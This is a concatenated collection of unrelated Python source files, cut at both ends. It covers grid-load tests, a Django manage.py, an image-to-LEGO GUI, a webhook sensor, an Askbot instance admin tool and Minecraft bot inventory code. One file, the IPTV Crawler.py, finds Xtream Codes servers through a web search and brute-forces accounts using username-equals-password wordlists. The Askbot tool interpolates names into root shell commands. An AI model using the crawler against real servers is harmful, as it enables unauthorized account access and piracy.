transform_vectors = self.col.check_collision(pos, current_vector)
if not all(transform_vectors):
possible_mtv.append(current_vector)
return min(possible_mtv)
|
data/WattTime/pyiso/tests/test_load.py
|
from pyiso import client_factory, BALANCING_AUTHORITIES
from pyiso.base import BaseClient
from pyiso.eu import EUClient
from unittest import TestCase
import pytz
from datetime import datetime, timedelta
class TestBaseLoad(TestCase):
def setUp(self):
bc = BaseClient()
self.MARKET_CHOICES = bc.MARKET_CHOICES
self.FREQUENCY_CHOICES = bc.FREQUENCY_CHOICES
self.BA_CHOICES = BALANCING_AUTHORITIES.keys()
def _run_test(self, ba_name, expect_data=True, **kwargs):
c = client_factory(ba_name)
data = c.get_load(**kwargs)
if expect_data:
self.assertGreaterEqual(len(data), 1)
else:
self.assertEqual(data, [])
for dp in data:
self.assertEqual(set(['load_MW', 'ba_name',
'timestamp', 'freq', 'market']),
set(dp.keys()))
self.assertEqual(dp['timestamp'].tzinfo, pytz.utc)
self.assertIn(dp['ba_name'], self.BA_CHOICES)
self.assertGreaterEqual(dp['load_MW']+1, dp['load_MW'])
if c.options['forecast']:
self.assertGreaterEqual(dp['timestamp'], pytz.utc.localize(datetime.utcnow()))
else:
self.assertLess(dp['timestamp'], pytz.utc.localize(datetime.utcnow()))
return data
def _run_notimplemented_test(self, ba_name, **kwargs):
c = client_factory(ba_name)
self.assertRaises(NotImplementedError, c.get_load)
class TestBPALoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('BPA', latest=True, market=self.MARKET_CHOICES.fivemin)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('BPA', start_at=today-timedelta(days=2),
end_at=today-timedelta(days=1))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_date_range_farpast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('BPA', start_at=today-timedelta(days=20),
end_at=today-timedelta(days=10))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
class TestCAISOLoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('CAISO', latest=True, market=self.MARKET_CHOICES.fivemin)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('CAISO', start_at=today-timedelta(days=2),
end_at=today-timedelta(days=1))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_forecast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('CAISO', start_at=today + timedelta(hours=20),
end_at=today+timedelta(days=2))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
class TestERCOTLoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('ERCOT', latest=True, market=self.MARKET_CHOICES.fivemin)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def test_forecast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('ERCOT', start_at=today + timedelta(hours=20),
end_at=today+timedelta(days=2))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
self.assertGreaterEqual(min(timestamps), today+timedelta(hours=20))
self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestISONELoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('ISONE', latest=True)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('ISONE', start_at=today-timedelta(days=2),
end_at=today-timedelta(days=1))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_forecast(self):
data = self._run_test('ISONE', forecast=True, market='DAHR', freq='1hr')
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
class TestMISOLoad(TestBaseLoad):
def test_forecast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('MISO', start_at=today + timedelta(hours=10),
end_at=today+timedelta(days=2))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
self.assertGreaterEqual(min(timestamps), today+timedelta(hours=10))
self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestNEVPLoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('NEVP', latest=True)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.hourly)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.hourly)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('NEVP', start_at=today-timedelta(days=1),
end_at=today)
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_date_range_farpast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('NEVP', start_at=today-timedelta(days=35),
end_at=today-timedelta(days=33))
class TestNYISOLoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('NYISO', latest=True, market=self.MARKET_CHOICES.fivemin)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('NYISO', start_at=today-timedelta(days=2),
end_at=today-timedelta(days=1))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_forecast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('NYISO', start_at=today + timedelta(hours=20),
end_at=today+timedelta(days=2))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
self.assertGreaterEqual(min(timestamps), today+timedelta(hours=20))
self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestPJMLoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('PJM', latest=True, market=self.MARKET_CHOICES.fivemin)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def test_forecast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('PJM', start_at=today + timedelta(hours=20),
end_at=today+timedelta(days=2))
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
self.assertGreaterEqual(min(timestamps), today+timedelta(hours=20))
self.assertLessEqual(min(timestamps), today+timedelta(days=2))
class TestSPPLoad(TestBaseLoad):
def test_failing(self):
self._run_notimplemented_test('SPP')
class TestSPPCLoad(TestBaseLoad):
def test_latest(self):
data = self._run_test('SPPC', latest=True)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.hourly)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.hourly)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('SPPC', start_at=today-timedelta(days=1),
end_at=today)
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_date_range_farpast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('SPPC', start_at=today-timedelta(days=35),
end_at=today-timedelta(days=33))
class TestSVERILoad(TestBaseLoad):
def setUp(self):
super(TestSVERILoad, self).setUp()
self.bas = [k for k, v in BALANCING_AUTHORITIES.items() if v['module'] == 'sveri']
def test_latest_all(self):
for ba in self.bas:
self._test_latest(ba)
def test_date_range_all(self):
for ba in self.bas:
self._test_date_range(ba)
def _test_latest(self, ba):
data = self._run_test(ba, latest=True)
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
def _test_date_range(self, ba):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test(ba, start_at=today - timedelta(days=3),
end_at=today - timedelta(days=2), market=self.MARKET_CHOICES.fivemin)
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.fivemin)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.fivemin)
class TestEULoad(TestBaseLoad):
def setUp(self):
super(TestEULoad, self).setUp()
self.BA_CHOICES = EUClient.CONTROL_AREAS.keys()
def test_latest(self):
data = self._run_test('EU', latest=True, market=self.MARKET_CHOICES.hourly,
control_area='IT')
timestamps = [d['timestamp'] for d in data]
self.assertEqual(len(set(timestamps)), 1)
for dp in data:
self.assertEqual(dp['market'], self.MARKET_CHOICES.hourly)
self.assertEqual(dp['freq'], self.FREQUENCY_CHOICES.hourly)
def test_date_range(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('EU', start_at=today-timedelta(days=2),
end_at=today-timedelta(days=1),
control_area='IT')
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
def test_forecast(self):
today = datetime.today().replace(tzinfo=pytz.utc)
data = self._run_test('EU', start_at=today+timedelta(hours=20),
end_at=today+timedelta(days=1),
control_area='IT')
timestamps = [d['timestamp'] for d in data]
self.assertGreater(len(set(timestamps)), 1)
|
data/Miserlou/django-zappa/manage.py
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_settings")
from django.core.management import execute_from_command_line
is_testing = 'test' in sys.argv
if is_testing:
import coverage
cov = coverage.coverage(include="django_zappa/*", omit=['*tests.py'])
cov.erase()
cov.start()
execute_from_command_line(sys.argv)
if is_testing:
cov.stop()
cov.save()
cov.report()
|
data/Pirate-Crew/IPTV/iptv/Crawler.py
|
import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse
"""Crawler
Class that handles the crawling process that fetch accounts on illegal IPTVs
Authors:
Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
"""
class Crawler(object):
version = "1.2.3"
outputDir = "output"
languageDir = "languages"
basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
searchString = "Xtream Codes v1.0.59.5"
def __init__(self, language = "it"):
"""Default constructor
Keyword arguments:
language -- Language parameter allows us to understand what kind of
names file we need to use. (default it)
"""
self.language = language.lower()
self.parsedUrls = []
self.foundedAccounts = 0
def change_language(self, language = "it"):
"""Set the language you want to use to brute force names
Keyword arguments:
language -- Language parameter allows us to understand what kind of
names file we need to use. (default it)
Return:
boolean -- true if the language file exists, otherwise false
"""
if os.path.isfile(self.languageDir + "/" + language + ".txt"):
self.language = language
return True
else:
return False
def search_links(self):
"""Print the first 30 links from a Web search
We set the limit of 30 links because this script serve as demonstration and it's
not intended to be use for personal purpose.
"""
for url in google.search(self.searchString, num=30, stop=1):
parsed = urlparse(url)
self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)
def search_accounts(self, url = None):
"""Search Accounts
This is the core method. It will crawl the give url for any possible accounts
If we found any we will create a new directory under /output with the name
of the site plus every account as five .m3u. Please use VLC for opening that
kind of files
Keyword arguments:
url -- an url from the fetched list. (default None)
Return:
string -- the status of the crawling session
"""
if not self.parsedUrls:
return "You must fetch some URLs first"
try:
if not url:
url = random.choice(self.parsedUrls)
fileName = self.languageDir + "/" + self.language + ".txt"
fileLength = self.file_length(fileName)
progressBar = pyprind.ProgBar(fileLength, title = "Fetching account from " + url + " this might take a while.", stream = 1, monitor = True)
foundedAccounts = 0
with open(fileName) as f:
rows = f.readlines()
for row in rows:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
response = opener.open(url + self.basicString % (row.rstrip().lstrip(), row.rstrip().lstrip()))
fetched = response.read()
fileLength = fileLength - 1
progressBar.update()
if len(fetched) > 0:
newPath = self.outputDir + "/" + url.replace("http://", "")
self.create_file(row, newPath, fetched)
self.parsedUrls.remove(url)
if self.foundedAccounts != 0:
return "Search done, account founded on " + url + ": " + str(self.foundedAccounts)
else:
return "No results for " + url
except IOError:
return "Cannot open the current Language file. Try another one"
except urllib2.HTTPError, e:
return "Ops, HTTPError exception here. Cannot fetch the current URL " + str(e.code)
except urllib2.URLError, e:
return "Ops, the URL seems broken." + str(e.reason)
except Exception:
return "Ops something went wrong!"
def create_file(self, row, newPath, fetched):
"""Create File
Once the parse founds something worth it, we need to create the .m3u file
to do so we except a newPath and the current row used from names file and also
the content from the fetched response
Keyword arguments:
row -- row of the language file, this allow us to understand which names
were useful for the brute force.
newPath -- The path that we use to store the current fetched accounts.
fetched -- the current response file from the attack.
"""
if os.path.exists(newPath) is False:
os.makedirs(newPath)
outputFile = open(str(newPath) + "/tv_channels_%s.m3u" % row.rstrip().lstrip(), "w")
outputFile.write(fetched)
self.foundedAccounts = self.foundedAccounts + 1
outputFile.close()
def file_length(self, fileName):
"""File Length
Cheapest way to calculate the rows of a file
Keyword arguments:
fileName -- string the filename into which we will check its Length
"""
with open(fileName) as f:
for i, l in enumerate(f):
pass
return i + 1
|
data/JuanPotato/Legofy/legofy/legofy_gui.py
|
import os
import legofy
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import filedialog
import tkinter.messagebox as tkmsg
LEGO_PALETTE = ('none', 'solid', 'transparent', 'effects', 'mono', 'all', )
class LegofyGui(tk.Tk):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wm_title("Legofy!")
self.iconbitmap(os.path.dirname(os.path.realpath(__file__)) + '/assets/brick.ico')
self.resizable(False, False)
self.body = LegofyGuiMainFrame(self)
self.body.grid(row=0, column=0, padx=10, pady=10)
class LegofyGuiMainFrame(tk.Frame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.chosenFile = None
self.chosenFilePath = tk.StringVar()
self.pathField = tk.Entry(self, width=40, textvariable=self.chosenFilePath, state=tk.DISABLED)
self.pathField.grid(row=0, column=0, padx=10)
self.selectFile = tk.Button(self, text="Choose file...", command=self.choose_a_file)
self.selectFile.grid(row=0, column=1)
self.groupFrame = tk.LabelFrame(self, text="Params", padx=5, pady=5)
self.groupFrame.grid(row=1, column=0, columnspan=2, )
self.colorPaletteLabel = tk.Label(self.groupFrame, text = 'Color Palette')
self.colorPaletteLabel.grid(row=0, column=0 )
self.colorPalette = ttk.Combobox(self.groupFrame)
self.colorPalette['values'] = LEGO_PALETTE
self.colorPalette.current(0)
self.colorPalette.grid(row=0, column=1)
self.brickNumberScale = tk.Scale(self.groupFrame, from_=1, to=200, orient=tk.HORIZONTAL, label="Number of bricks (longer edge)", length=250)
self.brickNumberScale.set(30)
self.brickNumberScale.grid(row=1, column=0, columnspan=2, )
self.convertFile = tk.Button(text="Legofy this image!", command=self.convert_file)
self.convertFile.grid(row=2, column=0, columnspan=2)
def choose_a_file(self):
options = {}
options['defaultextension'] = '.jpg'
options['filetypes'] = [('JPEG', '.jpg'),
('GIF', '.gif'),
('PNG', '.png'),]
options['initialdir'] = os.path.realpath("\\")
options['initialfile'] = ''
options['parent'] = self
options['title'] = 'Choose a file'
self.chosenFile = filedialog.askopenfile(mode='r', **options)
if self.chosenFile:
self.chosenFilePath.set(self.chosenFile.name)
def convert_file(self):
try:
if self.chosenFile is not None:
palette = self.colorPalette.get()
if palette in LEGO_PALETTE and palette != 'none':
legofy.main(self.chosenFile.name, size=self.brickNumberScale.get(), palette_mode=palette)
else:
legofy.main(self.chosenFile.name, size=self.brickNumberScale.get())
tkmsg.showinfo("Success!", "Your image has been legofied!")
else:
tkmsg.showerror("File not found", "Please select a file before legofying")
except Exception as e:
tkmsg.showerror("Error", str(e))
if __name__ == '__main__':
app = LegofyGui()
app.mainloop()
|
data/StackStorm/st2contrib/packs/circle_ci/sensors/webhook_sensor.py
|
import json
from flask import Flask, request, abort
from st2reactor.sensor.base import Sensor
TRIGGER_REF = 'circle_ci.build_event'
class CircleCIWebhookSensor(Sensor):
def setup(self):
self.host = self._config['host']
self.port = self._config['port']
self._endpoints = self._config['endpoints']
self.app = Flask(__name__)
self.trigger_ref = TRIGGER_REF
self.log = self._sensor_service.get_logger(__name__)
@self.app.route('/status')
def status():
return json.dumps({'response': 'OK'})
@self.app.route('/webhooks/<path:endpoint>', methods=['POST'])
def build_events(endpoint):
if endpoint not in self._endpoints:
self.log.error('Ignoring unknown endpoint : %s', endpoint)
abort(404)
webhook_body = request.get_json()
payload = {}
payload['headers'] = self._get_headers_as_dict(request.headers)
payload['body'] = webhook_body
response = self._sensor_service.dispatch(self.trigger_ref, payload)
self.log.debug(json.dumps(response))
return json.dumps({'response': 'triggerposted'})
def run(self):
self.app.run(host=self.host, port=self.port, threaded=True)
def cleanup(self):
pass
def _get_headers_as_dict(self, headers):
headers_dict = {}
for key, value in headers:
headers_dict[key] = value
return headers_dict
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
|
data/adamchainz/django-mysql/tests/testapp/enum_default_migrations/0003_remove_some_fields.py
|
from __future__ import unicode_literals
from django.db import migrations
from django_mysql.models import EnumField
class Migration(migrations.Migration):
dependencies = [
('testapp', '0002_add_some_fields'),
]
operations = [
migrations.AlterField(
model_name='EnumDefaultModel',
name='field',
field=EnumField(choices=[
('lion', 'Lion'), ('tiger', 'Tiger'), 'oh my!'
])
),
]
|
data/OpenMOOC/askbot-openmooc/askbotopenmooc/utils/openmooc-askbot-instancetool.py
|
"""
Askbot instance administration tool for creating, disabling or destroying
askbot instances
"""
import sys
import os
import time
if sys.version_info < (2, 6, 0):
print(' [WARNING] This script needs python 2.6. We don\'t guarantee it '
'works on other python versions.')
elif sys.version_info >= (3, 0, 0):
sys.stderr.write(' [ERROR] This script doesn\'t work in python 3.x series. '
'Exiting.')
sys.exit(2)
sys.path.insert(0, '/etc/openmooc/askbot')
sys.path.insert(0, os.getcwd())
import shutil
import optparse
import requests
import subprocess
try:
import instances_creator_conf as icc
import psycopg2
except ImportError:
sys.stderr.write(' [ERROR] Either we couldn\'t import the default settings '
'(instances_creator_conf) or you don\'t have psycopg2 '
'(Python PostgreSQL binding) installed.')
sys.exit(3)
os.environ['PGPASSWORD'] = icc.DB_PASSWORD
class AskbotInstance():
def __init__(self):
"""
Shared stuff between all the methods.
"""
if not os.environ['USER'] == 'root':
self.abort(' [ERROR] This script requires root access.')
sys.path.insert(0, icc.DEFAULT_INSTANCE_DIR)
def _populate_file(self, original_file, values):
"""
Basic abstraction layer for populating files on demand
original_file has to be a path to the file in string format
values is a dictionary containing the necessary key:value pairs.
"""
f = open(original_file, 'r')
file_content = f.read()
f.close()
populated_settings = file_content.format(**values)
f = open(original_file, 'w')
f.write(populated_settings)
f.close()
def create_instance(self, instance_name, instance_db_name):
"""
Create the main instance in the instances directory.
"""
INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
try:
shutil.copytree(icc.SKEL_DIR, INSTANCE_DIR)
os.chdir(INSTANCE_DIR)
template = os.path.join(INSTANCE_DIR, 'instance_settings.py')
os.symlink(
os.path.join('/usr', 'bin', 'openmooc-askbot-admin'),
os.path.join(INSTANCE_DIR, 'manage.py'))
values = {
'instance_name': instance_name,
'instance_db_name': instance_db_name,
'instance_db_host': icc.DB_HOST,
'base_url': icc.BASE_URL
}
self._populate_file(template, values)
print(' [ OK ] Instance {0} created.'.format(instance_name))
except:
self.abort(' [ERROR] Couldn\'t copy the instance skeleton into '
'destination or populate the settings. Please check: '
'a) You have permission. '
'b) The directory doesn\'t exist already.')
def create_db(self, instance_db_name):
"""
Create the database for the designated instance.
"""
createdb = subprocess.Popen(('su - postgres -c "createdb %s -w -O %s '
'-E UTF8"') % (instance_db_name,
icc.DB_USER), shell=True)
createdb.wait()
try:
psycopg2.connect(
database=instance_db_name,
user=icc.DB_USER,
password=icc.DB_PASSWORD,
host=icc.DB_HOST
)
print(' [ OK ] Database {0} created and connection '
'tested.'.format(instance_db_name))
except:
self.abort(' [ERROR] Couldn\'t connect to the PostgreSQL server '
'(authentication failed or server down). Aborting.')
def syncdb_and_migrate(self, instance_name):
"""
Do the syncdb and migrate actions for the selected intance. Please note
that this action does not create the superuser, it just synchronizes
and migrates the database.
"""
working_dir = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
os.chdir(working_dir)
syncdb = subprocess.Popen(('openmooc-askbot-admin syncdb --migrate '
'--noinput'), shell=True)
syncdb.wait()
def collect_static(seld, instance_name):
"""
Collect all the static files and prepare them to be used
"""
working_dir = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
os.chdir(working_dir)
collectstatic = subprocess.Popen(('openmooc-askbot-admin '
'collectstatic --noinput'),
shell=True)
collectstatic.wait()
def add_instance_to_supervisor(self, instance_name):
"""
Creates the supervisor file into the directory
"""
INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
try:
template = os.path.join(INSTANCE_DIR, 'supervisor.conf')
values = {
'instance_name': instance_name,
'instance_dir': INSTANCE_DIR
}
self._populate_file(template, values)
os.symlink(template, os.path.join(
'/etc', 'supervisord.d',
'openmooc-askbot-%s.conf' % instance_name))
print(' [ OK ] Populated the supervisor settings.')
except:
self.abort(' [ERROR] Couldn\'t populate the supervisor settings. '
'Exiting.')
def add_instance_to_nginx(self, instance_name):
"""
Creates the nginx file for the local askbot and also the nginx forward
configuration for the proxy machine. Remember that some values of the
forward file need to be changed manually!
"""
INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
try:
template = os.path.join(INSTANCE_DIR, 'nginx.conf')
values = {'instance_name': instance_name}
self._populate_file(template, values)
template = os.path.join(INSTANCE_DIR, 'nginx.forward.conf')
values = {'instance_name': instance_name}
self._populate_file(template, values)
print(' [ OK ] Populated nginx and nginx.forward settings.')
except:
self.abort(' [ERROR] Couldn\'t populate the nginx or the '
'nginx.forward settings. Exiting.')
def restart_server(self):
supervisord = subprocess.Popen(('service '
'supervisord restart'), shell=True)
supervisord.wait()
nginx = subprocess.Popen(('service '
'nginx restart'), shell=True)
nginx.wait()
time.sleep(5)
def update_entries_metadata(self):
"""
Update all entries' metadata
"""
try:
update_metadata = subprocess.Popen(('openmooc-askbot-admin '
'update_entries_metadata'),
shell=True)
update_metadata.wait()
url = ('https://idp.mooc.educalab.es/simplesaml/module.php/cron/'
'cron.php?key=%s&tag=metarefresh') % icc.META_REFRESH_KEY
requests.get(url)
except:
self.abort(' [ERROR] Couldn\'t update the entries\' metadata. '
'Exiting.')
def disable_instance(self, instance_name):
"""
Disables an instance so it won't be available anymore.
"""
INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
try:
if not os.path.isdir(icc.DEFAULT_DISABLED_INSTANCES_DIR):
os.makedirs(icc.DEFAULT_DISABLED_INSTANCES_DIR)
shutil.copy(INSTANCE_DIR, icc.DEFAULT_DISABLED_INSTANCES_DIR)
shutil.rmtree(INSTANCE_DIR)
print(' [ OK ] Instance {0} disabled.'.format(instance_name))
except:
self.abort(' [ERROR] Couldn\'t disable the instance. Please check '
'the directories.')
def destroy_instance(self, instance_name):
"""
Destroys the database and contents of the instance completely
"""
INSTANCE_DIR = os.path.join(icc.DEFAULT_INSTANCE_DIR, instance_name)
sys.path.insert(0, INSTANCE_DIR)
try:
import instance_settings
except:
self.abort(' [ERROR] Couldn\'t import the instance settings to '
'destroy it. Check that it exists. Aborting.')
try:
instance_db_name = instance_settings.DATABASE_NAME
dropdb = subprocess.Popen('su - postgres -c "dropdb %s"' %
instance_db_name, shell=True)
dropdb.wait()
shutil.rmtree(INSTANCE_DIR)
os.remove(os.path.join('/etc', 'supervisord.d',
'openmooc-askbot-%s.conf' % instance_name))
print(' [ OK ] Instance {0} destroyed.'.format(instance_name))
except:
self.abort(' [ERROR] Couldn\'t drop database or remove instance '
'files. Aborting.')
def abort(self, msg, status=1):
sys.stderr.write(msg)
sys.exit(status)
parser = optparse.OptionParser(
description=('This is OpenMOOC Askbot instance creator. This allows you '
'to easily create new instances for OpenMOOC Askbot without '
'any of the fuss of the terminal.'),
version='%prog 0.1 alpha'
)
parser.add_option(
'-c',
'--create',
help='<instance name> <instance database name>',
dest='instance_data',
action='store',
nargs=2
)
parser.add_option(
'-d',
'--disable',
help='Disables an instance (data is moved to /instances.disabled)',
dest='disable_instance_name'
)
parser.add_option(
'-k',
'--destroy',
help='Complete destroys an instance (erase everything)',
dest='destroy_instance_name'
)
parser.add_option(
'--no-metadata',
help='Avoid updating the entries\' metadata',
action='store_true',
dest='no_metadata'
)
(opts, args) = parser.parse_args()
inst = AskbotInstance()
if opts.instance_data:
INSTANCE_NAME = opts.instance_data[0]
INSTANCE_DB_NAME = opts.instance_data[1]
inst.create_instance(INSTANCE_NAME, INSTANCE_DB_NAME)
inst.add_instance_to_supervisor(INSTANCE_NAME)
inst.add_instance_to_nginx(INSTANCE_NAME)
inst.create_db(INSTANCE_DB_NAME)
inst.syncdb_and_migrate(INSTANCE_NAME)
inst.collect_static(INSTANCE_NAME)
inst.restart_server()
if not opts.no_metadata:
inst.update_entries_metadata()
elif opts.disable_instance_name:
INSTANCE_NAME = opts.disable_instance_name
inst.disable_instance(INSTANCE_NAME)
elif opts.destroy_instance_name:
INSTANCE_NAME = opts.destroy_instance_name
inst.destroy_instance(INSTANCE_NAME)
|
data/SpockBotMC/SpockBot/spockbot/mcdata/windows.py
|
import sys
import types
from minecraft_data.v1_8 import windows as windows_by_id
from minecraft_data.v1_8 import windows_list
from spockbot.mcdata import constants, get_item_or_block
from spockbot.mcdata.blocks import Block
from spockbot.mcdata.items import Item
from spockbot.mcdata.utils import camel_case, snake_case
def make_slot_check(wanted):
"""
Creates and returns a function that takes a slot
and checks if it matches the wanted item.
Args:
wanted: function(Slot) or Slot or itemID or (itemID, metadata)
"""
if isinstance(wanted, types.FunctionType):
return wanted
if isinstance(wanted, int):
item, meta = wanted, None
elif isinstance(wanted, Slot):
item, meta = wanted.item_id, wanted.damage
elif isinstance(wanted, (Item, Block)):
item, meta = wanted.id, wanted.metadata
elif isinstance(wanted, str):
item_or_block = get_item_or_block(wanted, init=True)
item, meta = item_or_block.id, item_or_block.metadata
else:
try:
item, meta = wanted
except TypeError:
raise ValueError('Illegal args for make_slot_check(): %s' % wanted)
return lambda slot: item == slot.item_id and meta in (None, slot.damage)
class Slot(object):
def __init__(self, window, slot_nr, id=constants.INV_ITEMID_EMPTY,
damage=0, amount=0, enchants=None):
self.window = window
self.slot_nr = slot_nr
self.item_id = id
self.damage = damage
self.amount = amount
self.nbt = enchants
self.item = get_item_or_block(self.item_id, self.damage) or Item()
def move_to_window(self, window, slot_nr):
self.window, self.slot_nr = window, slot_nr
@property
def is_empty(self):
return self.amount <= 0
def matches(self, other):
return make_slot_check(other)(self)
def stacks_with(self, other):
if self.item_id != other.item_id:
return False
if self.damage != other.damage:
return False
return self.item.stack_size != 1
def get_dict(self):
""" Formats the slot for network packing. """
data = {'id': self.item_id}
if self.item_id != constants.INV_ITEMID_EMPTY:
data['damage'] = self.damage
data['amount'] = self.amount
if self.nbt is not None:
data['enchants'] = self.nbt
return data
def copy(self):
return Slot(self.window, self.slot_nr, self.item_id,
self.damage, self.amount, self.nbt)
def __bool__(self):
return not self.is_empty
def __repr__(self):
if self.is_empty:
s = 'empty'
else:
item = self.item
s = '%i/%i %s' % (self.amount, item.stack_size, str(item))
if self.slot_nr != -1:
s += ' at %i' % self.slot_nr
if self.window:
s += ' in %s' % self.window
return '<Slot: %s>' % s
class SlotCursor(Slot):
def __init__(self, id=constants.INV_ITEMID_EMPTY, damage=0, amount=0,
enchants=None):
class CursorWindow(object):
window_id = constants.INV_WINID_CURSOR
def __repr__(self):
return 'CursorWindow()'
super(SlotCursor, self).__init__(
CursorWindow(), constants.INV_SLOT_NR_CURSOR,
id, damage, amount, enchants)
class BaseClick(object):
def get_packet(self, inv_plugin):
"""
Called by send_click() to prepare the sent packet.
Abstract method.
Args:
inv_plugin (InventoryPlugin): inventory plugin instance
"""
raise NotImplementedError()
def apply(self, inv_plugin):
"""
Called by on_success().
Abstract method.
Args:
inv_plugin (InventoryPlugin): inventory plugin instance
"""
raise NotImplementedError()
def on_success(self, inv_plugin, emit_set_slot):
"""
Called when the click was successful
and should be applied to the inventory.
Args:
inv_plugin (InventoryPlugin): inventory plugin instance
emit_set_slot (func): function to signal a slot change,
should be InventoryPlugin().emit_set_slot
"""
self.dirty = set()
self.apply(inv_plugin)
for changed_slot in self.dirty:
emit_set_slot(changed_slot)
def copy_slot_type(self, slot_from, slot_to):
slot_to.item_id, slot_to.damage = slot_from.item_id, slot_from.damage
slot_to.nbt = slot_from.nbt
self.mark_dirty(slot_to)
def swap_slots(self, slot_a, slot_b):
